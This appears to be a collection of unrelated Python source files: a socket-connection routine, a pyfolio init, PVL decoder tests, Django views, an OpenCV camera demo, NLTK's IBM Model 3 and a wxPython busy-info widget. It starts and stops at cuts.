'interval', SOL_TCP, TCP_KEEPINTVL, lka_intvl) try_setsockopt(self.__socket, 'count', SOL_TCP, TCP_KEEPCNT, lka_cnt) else: log.error('keepalive: implementation %r not recognized or not supported' % ka_sig) def __attempt_connection(self): """ Try connecting to the (host, port) tuples specified at construction time. """ sleep_exp = 1 connect_count = 0 while self.__running and self.__socket is None and connect_count < self.__reconnect_attempts_max: for host_and_port in self.__host_and_ports: try: log.debug("Attempting connection to host %s, port %s" % host_and_port) self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.__enable_keepalive() if self.__ssl: # wrap socket if self.__ssl_ca_certs: cert_validation = ssl.CERT_REQUIRED else: cert_validation = ssl.CERT_NONE self.__socket = ssl.wrap_socket(self.__socket, keyfile = self.__ssl_key_file, certfile = self.__ssl_cert_file, cert_reqs = cert_validation, ca_certs = self.__ssl_ca_certs, ssl_version = self.__ssl_version) self.__socket.settimeout(self.__timeout) if self.blocking is not None: self.__socket.setblocking(self.blocking) self.__socket.connect(host_and_port) # # Validate server cert # if self.__ssl and self.__ssl_cert_validator: cert = self.__socket.getpeercert() (ok, errmsg) = apply(self.__ssl_cert_validator, (cert, host_and_port[0])) if not ok: raise SSLError("Server certificate validation failed: %s" % errmsg) self.__current_host_and_port = host_and_port log.info("Established connection to host %s, port %s" % host_and_port) break except socket.error: self.__socket = None if isinstance(sys.exc_info()[1], tuple): exc = sys.exc_info()[1][1] else: exc = sys.exc_info()[1] connect_count += 1 log.warning("Could not connect to host %s, port %s: %s" % (host_and_port[0], host_and_port[1], exc)) if self.__socket is None: sleep_duration = (min(self.__reconnect_sleep_max, ((self.__reconnect_sleep_initial / (1.0 + self.__reconnect_sleep_increase)) * math.pow(1.0 + self.__reconnect_sleep_increase, sleep_exp))) * (1.0 + random.random() * self.__reconnect_sleep_jitter)) sleep_end = time.time() + sleep_duration log.debug("Sleeping for %.1f seconds before attempting reconnect" % sleep_duration) while self.__running and time.time() < sleep_end: time.sleep(0.2) if sleep_duration < self.__reconnect_sleep_max: sleep_exp += 1 if not self.__socket: raise exception.ConnectFailedException() def default_create_thread(callback): """ Default thread creation """ thread = threading.Thread(None, callback) thread.daemon = True # Don't let receiver thread prevent termination thread.start() return thread
import warnings from . import utils from . import timeseries from . import pos from . import txn from .tears import * # noqa from .plotting import * # noqa try: from . import bayesian except ImportError: warnings.warn( "Could not import bayesian submodule due to missing pymc3 dependency.", ImportWarning) __version__ = '0.1' __all__ = ['utils', 'timeseries', 'pos', 'txn', 'bayesian']
#!/usr/bin/env python """This module has tests for the pvl decoder functions.""" # Copyright 2019-2021, Ross A. Beyer ([email protected]) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime import itertools import unittest from decimal import Decimal from pvl.decoder import PVLDecoder, ODLDecoder, PDSLabelDecoder, for_try_except from pvl.collections import Quantity class TestForTryExcept(unittest.TestCase): def test_for_try_except(self): self.assertEqual( 5, for_try_except(ValueError, int, ("frank", "7.7", "5")) ) self.assertRaises( ValueError, for_try_except, ValueError, int, ("frank", "7.7", "a") ) self.assertEqual( datetime.date(2001, 1, 1), for_try_except( ValueError, datetime.datetime.strptime, itertools.repeat("2001-001"), ("%Y-%m-%d", "%Y-%j"), ).date(), ) class TestDecoder(unittest.TestCase): def setUp(self): self.d = PVLDecoder() def test_decode_quoted_string(self): self.assertEqual("Quoted", self.d.decode_quoted_string('"Quoted"')) self.assertEqual( 'He said, "hello"', self.d.decode_quoted_string("""'He said, "hello"'"""), ) self.assertEqual( 'She said, \\"bye\\"', self.d.decode_quoted_string(r"'She said, \"bye\"'"), ) self.assertEqual( "No\\tin Python", self.d.decode_quoted_string(r"'No\tin Python'") ) self.assertEqual( "Line -\n Continued", self.d.decode_quoted_string("'Line -\n Continued'"), ) # print(self.d.decode_quoted_string("""'mixed"\\'quotes'""")) def test_decode_unquoted_string(self): self.assertEqual("Unquoted", self.d.decode_unquoted_string("Unquoted")) for s in ( 'hhhhh"hello"', "Reserved=", "No\tin Python", "Line -\n Continued", ): with self.subTest(string=s): self.assertRaises(ValueError, self.d.decode_unquoted_string, s) def test_decode_decimal(self): for p in ( ("125", 125), ("+211109", 211109), ("-79", -79), ("69.35", 69.35), ("+12456.345", 12456.345), # Integers ("-0.23456", -0.23456), (".05", 0.05), ("-7.", -7), # Floating ("-2.345678E12", -2345678000000.0), ("1.567E-10", 1.567e-10), ("+4.99E+3", 4990.0), ): # Exponential with self.subTest(pair=p): self.assertEqual(p[1], self.d.decode_decimal(p[0])) for s in ("2#0101#", "frank"): with self.subTest(string=s): self.assertRaises(ValueError, self.d.decode_decimal, s) def test_decode_withDecimal(self): d = PVLDecoder(real_cls=Decimal) s = "123.450" self.assertEqual(d.decode_decimal(s), Decimal(s)) self.assertRaises(ValueError, d.decode_decimal, "fruit") def test_decode_non_decimal(self): for p in ( ("2#0101#", 5), ("+2#0101#", 5), ("-2#0101#", -5), # Binary ("8#0107#", 71), ("+8#0156#", 110), ("-8#0134#", -92), # Oct ("16#100A#", 4106), ("+16#23Bc#", 9148), ("-16#98ef#", -39151), ): # Hex with self.subTest(pair=p): self.assertEqual(p[1], self.d.decode_non_decimal(p[0])) def test_decode_datetime(self): utc = datetime.timezone.utc for p in ( ("2001-01-01", datetime.date(2001, 1, 1)), ("2001-027", datetime.date(2001, 1, 27)), ("2001-027Z", datetime.date(2001, 1, 27)), ("23:45", datetime.time(23, 45, tzinfo=utc)), ("01:42:57", datetime.time(1, 42, 57, tzinfo=utc)), ("12:34:56.789", datetime.time(12, 34, 56, 789000, tzinfo=utc)), ( "2001-027T23:45", datetime.datetime(2001, 1, 27, 23, 45, tzinfo=utc), ), ( "2001-01-01T01:34Z", datetime.datetime(2001, 1, 1, 1, 34, tzinfo=utc), ), ("01:42:57Z", datetime.time(1, 42, 57, tzinfo=utc)), ("2001-12-31T01:59:60.123Z", "2001-12-31T01:59:60.123Z"), ("2001-12-31T01:59:60.123456789", "2001-12-31T01:59:60.123456789"), ("01:00:60", "01:00:60"), ): with self.subTest(pair=p): self.assertEqual(p[1], self.d.decode_datetime(p[0])) self.assertRaises(ValueError, self.d.decode_datetime, "frank") fancy = "2001-001T01:10:39+7" self.assertRaises(ValueError, self.d.decode_datetime, fancy) def test_decode_simple_value(self): for p in ( ("2001-01-01", datetime.date(2001, 1, 1)), ("2#0101#", 5), ("-79", -79), ("Unquoted", "Unquoted"), ('"Quoted"', "Quoted"), ("Null", None), ("TRUE", True), ("false", False), ): with self.subTest(pair=p): self.assertEqual(p[1], self.d.decode_simple_value(p[0])) def test_decode_quantity(self): q = self.d.decode_quantity("15", "m/s") self.assertEqual(q, Quantity("15", "m/s")) try: from astropy import units as u d = PVLDecoder(quantity_cls=u.Quantity) q = d.decode_quantity("15", "m/s") self.assertEqual(q, u.Quantity("15", "m/s")) except ImportError: # astropy isn't available. pass try: from pint import Quantity as pintquant d = PVLDecoder(quantity_cls=pintquant) q = d.decode_quantity("15", "m/s") self.assertEqual(q, pintquant("15", "m/s")) except ImportError: # pint isn't available. pass class TestODLDecoder(unittest.TestCase): def setUp(self): self.d = ODLDecoder() def test_decode_datetime(self): utc = datetime.timezone.utc for p in ( ("1990-07-04", datetime.date(1990, 7, 4)), ("1990-158", datetime.date(1990, 6, 7)), ("2001-001", datetime.date(2001, 1, 1)), ("2001-01-01", datetime.date(2001, 1, 1)), ("12:00", datetime.time(12)), ("12:00:45", datetime.time(12, 0, 45)), ( "12:00:45.4571", datetime.time(12, 0, 45, 457100), ), ("15:24:12Z", datetime.time(15, 24, 12, tzinfo=utc)), ("1990-07-04T12:00", datetime.datetime(1990, 7, 4, 12)), ( "1990-158T15:24:12Z", datetime.datetime(1990, 6, 7, 15, 24, 12, tzinfo=utc), ), ): with self.subTest(pair=p): self.assertEqual(p[1], self.d.decode_datetime(p[0])) self.assertRaises(ValueError, self.d.decode_datetime, "01:00:60") try: from dateutil import tz tz_plus_7 = tz.tzoffset("+7", datetime.timedelta(hours=7)) for p in ( ("01:12:22+07", datetime.time(1, 12, 22, tzinfo=tz_plus_7)), ("01:12:22+7", datetime.time(1, 12, 22, tzinfo=tz_plus_7)), ( "01:10:39.4575+07", datetime.time(1, 10, 39, 457500, tzinfo=tz_plus_7), ), ( "2001-001T01:10:39+7", datetime.datetime(2001, 1, 1, 1, 10, 39, tzinfo=tz_plus_7), ), ( "2001-001T01:10:39.457591+7", datetime.datetime( 2001, 1, 1, 1, 10, 39, 457591, tzinfo=tz_plus_7 ), ), ): with self.subTest(pair=p): self.assertEqual(p[1], self.d.decode_datetime(p[0])) except ImportError: # dateutil isn't available. pass class TestPDS3Decoder(unittest.TestCase): def setUp(self): self.d = PDSLabelDecoder() def test_decode_datetime(self): utc = datetime.timezone.utc for p in ( ("1990-07-04", datetime.date(1990, 7, 4)), ("1990-158", datetime.date(1990, 6, 7)), ("2001-001", datetime.date(2001, 1, 1)), ("2001-01-01", datetime.date(2001, 1, 1)), ("12:00", datetime.time(12, tzinfo=utc)), ("12:00:45", datetime.time(12, 0, 45, tzinfo=utc)), ("15:24:12Z", datetime.time(15, 24, 12, tzinfo=utc)), ( "1990-158T15:24:12Z", datetime.datetime(1990, 6, 7, 15, 24, 12, tzinfo=utc)), ( "12:00:45.457", datetime.time(12, 0, 45, 457000, tzinfo=utc), ), ( "1990-07-04T12:00", datetime.datetime(1990, 7, 4, 12, tzinfo=utc), ), ): with self.subTest(pair=p): self.assertEqual(p[1], self.d.decode_datetime(p[0])) for t in ( "01:12:22+07", "01:12:22+7", "01:10:39.4575+07", "2001-001T01:10:39+7", "2001-001T01:10:39.457591+7", "2001-001T01:10:39.457591", ): with self.subTest(time=t): self.assertRaises(ValueError, self.d.decode_datetime, t)
from django.core.urlresolvers import reverse from bakery.views import BuildableDetailView, BuildableListView from core.views import get_build_path from .models import BirthCertificate class ListView(BuildableListView): def __init__(self, **kwargs): super(ListView, self).__init__(**kwargs) ListView.build_path = get_build_path('bcs:list', 'index.html') template_name = 'bcs/list.html' context_object_name = 'list' def get_queryset(self): """ Return the documents ordered by location name""" return BirthCertificate.objects.order_by('location') class DetailView(BuildableDetailView): model = BirthCertificate template_name = 'bcs/detail.html' context_object_name = 'bc' def get_url(self, obj): return reverse('bcs:detail', kwargs={'pk': obj.pk})
import numpy import cv2 import time print "Starting demo" frameTimerDuration = 1 # This is the desired resolution of the Pi camera resolution = (320, 240) # This is the desired maximum framerate, 0 for maximum possible throughput framerate = 0 # These are the resolution of the output display, set these displayWidth = 32.0 displayHeight = 16.0 # These are the horizontal margins of the input feed to crop, everything else scales to fit these xLeft = 150 xRight = 150 # Open cam, decode image, show in window cap = cv2.VideoCapture(0) # use 1 or 2 or ... for other camera success, img = cap.read() resolution = (len(img[0]), len(img)) print "input resolution is %d,%d" % resolution print "target resolution is %d,%d" % (displayWidth, displayHeight) cv2.namedWindow("Original") cv2.namedWindow("Cropped") cv2.namedWindow("Downsampled") cv2.namedWindow("Equalized") cv2.namedWindow("Contrast") _displayAspectRatio = displayHeight / displayWidth print "aspect ratio %f" % _displayAspectRatio _xMin = xLeft _xMax = resolution[0]-xRight _width = _xMax+1 - _xMin _height = int(_displayAspectRatio * _width) _yMin = int((resolution[1] - _height)/2) _yMax = _yMin + _height print "min = %d, max = %d, height = %d" % (_yMin, _yMax, _height) downsampleXFactor = displayWidth / _width downsampleYFactor = displayHeight / _height print "Crop to (%d,%d)=%d:(%d,%d)=%d" % (_xMin,_xMax,(_xMax-_xMin),_yMin,_yMax,(_yMax-_yMin)) print "Scaling by (x,y) %f, %f" % (downsampleXFactor, downsampleYFactor) print "Scales to (%d,%d)" % (_width*downsampleXFactor,_height*downsampleYFactor) def get_brightness(img): hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV) averageBrightness = int(cv2.mean(hsv[:,:,2])[0]) return bytearray(format(averageBrightness,'05d')) def equalize_brightness(img): hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) hsv[:,:,2] = cv2.equalizeHist(hsv[:,:,2]) img = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR) return img def equalize_hist(img): for c in xrange(0, 2): img[:,:,c] = cv2.equalizeHist(img[:,:,c]) return img frameTimer = time.time() + frameTimerDuration frameCounter = 0 try: key = -1 while(key < 0): success, img = cap.read() frameCounter += 1 if time.time() > frameTimer: print "processed %d frames in %f seconds" % (frameCounter, frameTimerDuration) frameCounter = 0 frameTimer = time.time() + frameTimerDuration brightness = get_brightness(img) print "Brightness " + brightness cropImg = img[_yMin:_yMax,_xMin:_xMax] smallImg = cv2.resize(cropImg, (0,0), fx=downsampleXFactor, fy=downsampleYFactor) equalizedImg = numpy.copy(cropImg) contrastImg = numpy.copy(cropImg) equalize_hist(equalizedImg) contrastImg = equalize_brightness(contrastImg) cv2.imshow("Original", img) cv2.imshow("Cropped", cropImg) cv2.imshow("Downsampled", smallImg) cv2.imshow("Equalized", equalizedImg) cv2.imshow("Contrast", contrastImg) key = cv2.waitKey(1) except KeyboardInterrupt as e: print "Interrupted" stream.close() cap.close() camera.close() cv2.destroyAllWindows()
# -*- coding: utf-8 -*- # Natural Language Toolkit: IBM Model 3 # # Copyright (C) 2001-2013 NLTK Project # Authors: Chin Yee Lee, Hengfeng Li, Ruxin Hou, Calvin Tanujaya Lim # URL: <http://nltk.org/> # For license information, see LICENSE.TXT """ Translation model that considers how a word can be aligned to multiple words in another language. IBM Model 3 improves on Model 2 by directly modeling the phenomenon where a word in one language may be translated into zero or more words in another. This is expressed by the fertility probability, n(phi | source word). If a source word translates into more than one word, it is possible to generate sentences that have the same alignment in multiple ways. This is modeled by a distortion step. The distortion probability, d(j|i,l,m), predicts a target word position, given its aligned source word's position. The distortion probability replaces the alignment probability of Model 2. The fertility probability is not applicable for NULL. Target words that align to NULL are assumed to be distributed uniformly in the target sentence. The existence of these words is modeled by p1, the probability that a target word produced by a real source word requires another target word that is produced by NULL. The EM algorithm used in Model 3 is: E step - In the training data, collect counts, weighted by prior probabilities. (a) count how many times a source language word is translated into a target language word (b) count how many times a particular position in the target sentence is aligned to a particular position in the source sentence (c) count how many times a source word is aligned to phi number of target words (d) count how many times NULL is aligned to a target word M step - Estimate new probabilities based on the counts from the E step Because there are too many possible alignments, only the most probable ones are considered. First, the best alignment is determined using prior probabilities. Then, a hill climbing approach is used to find other good candidates. Notations: i: Position in the source sentence Valid values are 0 (for NULL), 1, 2, ..., length of source sentence j: Position in the target sentence Valid values are 1, 2, ..., length of target sentence l: Number of words in the source sentence, excluding NULL m: Number of words in the target sentence s: A word in the source language t: A word in the target language phi: Fertility, the number of target words produced by a source word p1: Probability that a target word produced by a source word is accompanied by another target word that is aligned to NULL p0: 1 - p1 References: Philipp Koehn. 2010. Statistical Machine Translation. Cambridge University Press, New York. Peter E Brown, Stephen A. Della Pietra, Vincent J. Della Pietra, and Robert L. Mercer. 1993. The Mathematics of Statistical Machine Translation: Parameter Estimation. Computational Linguistics, 19 (2), 263-311. """ from __future__ import division from collections import defaultdict from math import factorial from nltk.translate import AlignedSent from nltk.translate import Alignment from nltk.translate import IBMModel from nltk.translate import IBMModel2 from nltk.translate.ibm_model import Counts import warnings class IBMModel3(IBMModel): """ Translation model that considers how a word can be aligned to multiple words in another language >>> bitext = [] >>> bitext.append(AlignedSent(['klein', 'ist', 'das', 'haus'], ['the', 'house', 'is', 'small'])) >>> bitext.append(AlignedSent(['das', 'haus', 'war', 'ja', 'groß'], ['the', 'house', 'was', 'big'])) >>> bitext.append(AlignedSent(['das', 'buch', 'ist', 'ja', 'klein'], ['the', 'book', 'is', 'small'])) >>> bitext.append(AlignedSent(['ein', 'haus', 'ist', 'klein'], ['a', 'house', 'is', 'small'])) >>> bitext.append(AlignedSent(['das', 'haus'], ['the', 'house'])) >>> bitext.append(AlignedSent(['das', 'buch'], ['the', 'book'])) >>> bitext.append(AlignedSent(['ein', 'buch'], ['a', 'book'])) >>> bitext.append(AlignedSent(['ich', 'fasse', 'das', 'buch', 'zusammen'], ['i', 'summarize', 'the', 'book'])) >>> bitext.append(AlignedSent(['fasse', 'zusammen'], ['summarize'])) >>> ibm3 = IBMModel3(bitext, 5) >>> print(round(ibm3.translation_table['buch']['book'], 3)) 1.0 >>> print(round(ibm3.translation_table['das']['book'], 3)) 0.0 >>> print(round(ibm3.translation_table['ja'][None], 3)) 1.0 >>> print(round(ibm3.distortion_table[1][1][2][2], 3)) 1.0 >>> print(round(ibm3.distortion_table[1][2][2][2], 3)) 0.0 >>> print(round(ibm3.distortion_table[2][2][4][5], 3)) 0.75 >>> print(round(ibm3.fertility_table[2]['summarize'], 3)) 1.0 >>> print(round(ibm3.fertility_table[1]['book'], 3)) 1.0 >>> print(ibm3.p1) 0.054... >>> test_sentence = bitext[2] >>> test_sentence.words ['das', 'buch', 'ist', 'ja', 'klein'] >>> test_sentence.mots ['the', 'book', 'is', 'small'] >>> test_sentence.alignment Alignment([(0, 0), (1, 1), (2, 2), (3, None), (4, 3)]) """ def __init__(self, sentence_aligned_corpus, iterations, probability_tables=None): """ Train on ``sentence_aligned_corpus`` and create a lexical translation model, a distortion model, a fertility model, and a model for generating NULL-aligned words. Translation direction is from ``AlignedSent.mots`` to ``AlignedSent.words``. :param sentence_aligned_corpus: Sentence-aligned parallel corpus :type sentence_aligned_corpus: list(AlignedSent) :param iterations: Number of iterations to run training algorithm :type iterations: int :param probability_tables: Optional. Use this to pass in custom probability values. If not specified, probabilities will be set to a uniform distribution, or some other sensible value. If specified, all the following entries must be present: ``translation_table``, ``alignment_table``, ``fertility_table``, ``p1``, ``distortion_table``. See ``IBMModel`` for the type and purpose of these tables. :type probability_tables: dict[str]: object """ super(IBMModel3, self).__init__(sentence_aligned_corpus) self.reset_probabilities() if probability_tables is None: # Get translation and alignment probabilities from IBM Model 2 ibm2 = IBMModel2(sentence_aligned_corpus, iterations) self.translation_table = ibm2.translation_table self.alignment_table = ibm2.alignment_table self.set_uniform_probabilities(sentence_aligned_corpus) else: # Set user-defined probabilities self.translation_table = probability_tables['translation_table'] self.alignment_table = probability_tables['alignment_table'] self.fertility_table = probability_tables['fertility_table'] self.p1 = probability_tables['p1'] self.distortion_table = probability_tables['distortion_table'] for n in range(0, iterations): self.train(sentence_aligned_corpus) def reset_probabilities(self): super(IBMModel3, self).reset_probabilities() self.distortion_table = defaultdict( lambda: defaultdict(lambda: defaultdict(lambda: defaultdict( lambda: self.MIN_PROB)))) """ dict[int][int][int][int]: float. Probability(j | i,l,m). Values accessed as ``distortion_table[j][i][l][m]``. """ def set_uniform_probabilities(self, sentence_aligned_corpus): # d(j | i,l,m) = 1 / m for all i, j, l, m l_m_combinations = set() for aligned_sentence in sentence_aligned_corpus: l = len(aligned_sentence.mots) m = len(aligned_sentence.words) if (l, m) not in l_m_combinations: l_m_combinations.add((l, m)) initial_prob = 1 / float(m) if initial_prob < IBMModel.MIN_PROB: warnings.warn("A target sentence is too long (" + str(m) + " words). Results may be less accurate.") for j in range(1, m + 1): for i in range(0, l + 1): self.distortion_table[j][i][l][m] = initial_prob # simple initialization, taken from GIZA++ self.fertility_table[0] = defaultdict(lambda: 0.2) self.fertility_table[1] = defaultdict(lambda: 0.65) self.fertility_table[2] = defaultdict(lambda: 0.1) self.fertility_table[3] = defaultdict(lambda: 0.04) MAX_FERTILITY = 10 initial_fert_prob = 0.01 / (MAX_FERTILITY - 4) for phi in range(4, MAX_FERTILITY): self.fertility_table[phi] = defaultdict(lambda: initial_fert_prob) self.p1 = 0.5 def train(self, parallel_corpus): counts = Model3Counts() for aligned_sentence in parallel_corpus: l = len(aligned_sentence.mots) m = len(aligned_sentence.words) # Sample the alignment space sampled_alignments, best_alignment = self.sample(aligned_sentence) # Record the most probable alignment aligned_sentence.alignment = Alignment( best_alignment.zero_indexed_alignment()) # E step (a): Compute normalization factors to weigh counts total_count = self.prob_of_alignments(sampled_alignments) # E step (b): Collect counts for alignment_info in sampled_alignments: count = self.prob_t_a_given_s(alignment_info) normalized_count = count / total_count for j in range(1, m + 1): counts.update_lexical_translation( normalized_count, alignment_info, j) counts.update_distortion( normalized_count, alignment_info, j, l, m) counts.update_null_generation(normalized_count, alignment_info) counts.update_fertility(normalized_count, alignment_info) # M step: Update probabilities with maximum likelihood estimates # If any probability is less than MIN_PROB, clamp it to MIN_PROB existing_alignment_table = self.alignment_table self.reset_probabilities() self.alignment_table = existing_alignment_table # don't retrain self.maximize_lexical_translation_probabilities(counts) self.maximize_distortion_probabilities(counts) self.maximize_fertility_probabilities(counts) self.maximize_null_generation_probabilities(counts) def maximize_distortion_probabilities(self, counts): MIN_PROB = IBMModel.MIN_PROB for j, i_s in counts.distortion.items(): for i, src_sentence_lengths in i_s.items(): for l, trg_sentence_lengths in src_sentence_lengths.items(): for m in trg_sentence_lengths: estimate = (counts.distortion[j][i][l][m] / counts.distortion_for_any_j[i][l][m]) self.distortion_table[j][i][l][m] = max(estimate, MIN_PROB) def prob_t_a_given_s(self, alignment_info): """ Probability of target sentence and an alignment given the source sentence """ src_sentence = alignment_info.src_sentence trg_sentence = alignment_info.trg_sentence l = len(src_sentence) - 1 # exclude NULL m = len(trg_sentence) - 1 p1 = self.p1 p0 = 1 - p1 probability = 1.0 MIN_PROB = IBMModel.MIN_PROB # Combine NULL insertion probability null_fertility = alignment_info.fertility_of_i(0) probability *= (pow(p1, null_fertility) * pow(p0, m - 2 * null_fertility)) if probability < MIN_PROB: return MIN_PROB # Compute combination (m - null_fertility) choose null_fertility for i in range(1, null_fertility + 1): probability *= (m - null_fertility - i + 1) / i if probability < MIN_PROB: return MIN_PROB # Combine fertility probabilities for i in range(1, l + 1): fertility = alignment_info.fertility_of_i(i) probability *= (factorial(fertility) * self.fertility_table[fertility][src_sentence[i]]) if probability < MIN_PROB: return MIN_PROB # Combine lexical and distortion probabilities for j in range(1, m + 1): t = trg_sentence[j] i = alignment_info.alignment[j] s = src_sentence[i] probability *= (self.translation_table[t][s] * self.distortion_table[j][i][l][m]) if probability < MIN_PROB: return MIN_PROB return probability class Model3Counts(Counts): """ Data object to store counts of various parameters during training. Includes counts for distortion. """ def __init__(self): super(Model3Counts, self).__init__() self.distortion = defaultdict( lambda: defaultdict(lambda: defaultdict(lambda: defaultdict( lambda: 0.0)))) self.distortion_for_any_j = defaultdict( lambda: defaultdict(lambda: defaultdict(lambda: 0.0))) def update_distortion(self, count, alignment_info, j, l, m): i = alignment_info.alignment[j] self.distortion[j][i][l][m] += count self.distortion_for_any_j[i][l][m] += count
""" :class:`PyBusyInfo` constructs a busy info window and displays a message in it. Description =========== :class:`PyBusyInfo` constructs a busy info window and displays a message in it. This class makes it easy to tell your user that the program is temporarily busy. Just create a :class:`PyBusyInfo` object, and within the current scope, a message window will be shown. For example:: busy = PyBusyInfo("Please wait, working...") for i in xrange(10000): DoACalculation() del busy It works by creating a window in the constructor, and deleting it in the destructor. You may also want to call :func:`Yield` () to refresh the window periodically (in case it had been obscured by other windows, for example). Usage ===== Usage example:: import wx import wx.lib.agw.pybusyinfo as PBI class MyFrame(wx.Frame): def __init__(self, parent): wx.Frame.__init__(self, parent, -1, "PyBusyInfo Demo") panel = wx.Panel(self) b = wx.Button(panel, -1, "Test PyBusyInfo ", (50,50)) self.Bind(wx.EVT_BUTTON, self.OnButton, b) def OnButton(self, event): message = "Please wait 5 seconds, working..." busy = PBI.PyBusyInfo(message, parent=self, title="Really Busy") wx.Yield() for indx in xrange(5): wx.MilliSleep(1000) del busy # our normal wxApp-derived class, as usual app = wx.App(0) frame = MyFrame(None) app.SetTopWindow(frame) frame.Show() app.MainLoop() Supported Platforms =================== :class:`PyBusyInfo` has been tested on the following platforms: * Windows (Windows XP). Window Styles ============= `No particular window styles are available for this class.` Events Processing ================= `No custom events are available for this class.` License And Version =================== :class:`PyBusyInfo` is distributed under the wxPython license. Latest Revision: Andrea Gavana @ 20 Mar 2012, 21.00 GMT Version 0.2 """ # Version Info __version__ = "0.2" import wx _ = wx.GetTranslation class PyInfoFrame(wx.Frame): """ Base class for :class:`PyBusyInfo`. """ def __init__(self, parent, message, title, icon): """ Default class constructor. :param `parent`: the frame parent; :param `message`: the message to display in the :class:`PyBusyInfo`; :param `title`: the main :class:`PyBusyInfo` title; :param `icon`: an icon to draw as the frame icon, an instance of :class:`Bitmap`. """ wx.Frame.__init__(self, parent, wx.ID_ANY, title, wx.DefaultPosition, wx.DefaultSize, wx.NO_BORDER|wx.FRAME_TOOL_WINDOW|wx.FRAME_SHAPED|wx.STAY_ON_TOP) panel = wx.Panel(self) panel.SetCursor(wx.HOURGLASS_CURSOR) self._message = message self._title = title self._icon = icon dc = wx.ClientDC(self) textWidth, textHeight, dummy = dc.GetMultiLineTextExtent(self._message) sizeText = wx.Size(textWidth, textHeight) self.SetClientSize((max(sizeText.x, 340) + 60, max(sizeText.y, 40) + 60)) # need to size the panel correctly first so that text.Centre() works panel.SetSize(self.GetClientSize()) # Bind the events to draw ourselves panel.Bind(wx.EVT_PAINT, self.OnPaint) panel.Bind(wx.EVT_ERASE_BACKGROUND, self.OnErase) self.Centre(wx.BOTH) # Create a non-rectangular region to set the frame shape size = self.GetSize() bmp = wx.EmptyBitmap(size.x, size.y) dc = wx.BufferedDC(None, bmp) dc.SetBackground(wx.Brush(wx.Colour(0, 0, 0), wx.SOLID)) dc.Clear() dc.SetPen(wx.Pen(wx.Colour(0, 0, 0), 1)) dc.DrawRoundedRectangle(0, 0, size.x, size.y, 12) r = wx.RegionFromBitmapColour(bmp, wx.Colour(0, 0, 0)) # Store the non-rectangular region self.reg = r if wx.Platform == "__WXGTK__": self.Bind(wx.EVT_WINDOW_CREATE, self.SetBusyShape) else: self.SetBusyShape() # Add a custom bitmap at the top (if any) def SetBusyShape(self, event=None): """ Sets :class:`PyInfoFrame` shape using the region created from the bitmap. :param `event`: a :class:`WindowCreateEvent` event (GTK only, as GTK supports setting the window shape only during window creation). """ self.SetShape(self.reg) if event: # GTK only event.Skip() def OnPaint(self, event): """ Handles the ``wx.EVT_PAINT`` event for :class:`PyInfoFrame`. :param `event`: a :class:`PaintEvent` to be processed. """ panel = event.GetEventObject() dc = wx.BufferedPaintDC(panel) dc.Clear() # Fill the background with a gradient shading startColour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_ACTIVECAPTION) endColour = wx.WHITE rect = panel.GetRect() dc.GradientFillLinear(rect, startColour, endColour, wx.SOUTH) # Draw the label font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT) dc.SetFont(font) # Draw the message rect2 = wx.Rect(*rect) rect2.height += 20 dc.DrawLabel(self._message, rect2, alignment=wx.ALIGN_CENTER|wx.ALIGN_CENTER) # Draw the top title font.SetWeight(wx.BOLD) dc.SetFont(font) dc.SetPen(wx.Pen(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT))) dc.SetTextForeground(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT)) if self._icon.IsOk(): iconWidth, iconHeight = self._icon.GetWidth(), self._icon.GetHeight() dummy, textHeight = dc.GetTextExtent(self._title) textXPos, textYPos = iconWidth + 10, (iconHeight-textHeight)/2 dc.DrawBitmap(self._icon, 5, 5, True) else: textXPos, textYPos = 5, 0 dc.DrawText(self._title, textXPos, textYPos+5) dc.DrawLine(5, 25, rect.width-5, 25) size = self.GetSize() dc.SetPen(wx.Pen(startColour, 1)) dc.SetBrush(wx.TRANSPARENT_BRUSH) dc.DrawRoundedRectangle(0, 0, size.x, size.y-1, 12) def OnErase(self, event): """ Handles the ``wx.EVT_ERASE_BACKGROUND`` event for :class:`PyInfoFrame`. :param `event`: a :class:`EraseEvent` event to be processed. :note: This method is intentionally empty to reduce flicker. """ # This is empty on purpose, to avoid flickering pass # -------------------------------------------------------------------- # # The actual PyBusyInfo implementation # -------------------------------------------------------------------- # class PyBusyInfo(object): """ Constructs a busy info window as child of parent and displays a message in it. """ def __init__(self, message, parent=None, title=_("Busy"), icon=wx.NullBitmap): """ Default class constructor. :param `parent`: the :class:`PyBusyInfo` parent; :param `message`: the message to display in the :class:`PyBusyInfo`; :param `title`: the main :class:`PyBusyInfo` title; :param `icon`: an icon to draw as the frame icon, an instance of :class:`Bitmap`. :note: If `parent` is not ``None`` you must ensure that it is not closed while the busy info is shown. """ self._infoFrame = PyInfoFrame(parent, message, title, icon) if parent and parent.HasFlag(wx.STAY_ON_TOP): # we must have this flag to be in front of our parent if it has it self._infoFrame.SetWindowStyleFlag(wx.STAY_ON_TOP) # Added for the screenshot-taking tool self.Show() def __del__(self): """ Overloaded method, for compatibility with wxWidgets. """ self._infoFrame.Show(False) self._infoFrame.Destroy() def Show(self, show=True): """ Shows or hides the window. You may need to call `Raise` for a top level window if you want to bring it to top, although this is not needed if :meth:`PyBusyInfo.Show` is called immediately after the frame creation. :param bool `show`: ``True`` to show the :class:`PyBusyInfo` frame, ``False`` to hide it. :return: ``True`` if the window has been shown or hidden or ``False`` if nothing was done because it already was in the requested state. .. note:: Notice that the default state of newly created top level windows is hidden (to allow you to create their contents without flicker) unlike for all the other, not derived from :class:`TopLevelWindow`, windows that are by default created in the shown state. .. versionadded:: 0.9.5 """ retVal = self._infoFrame.Show(show) if show: self._infoFrame.Refresh() self._infoFrame.Update() return retVal def Update(self): """ Calling this method immediately repaints the invalidated area of the window and all of its children recursively (this normally only happens when the flow of control returns to the event loop). :note: Notice that this function doesn't invalidate any area of the window so nothing happens if nothing has been invalidated 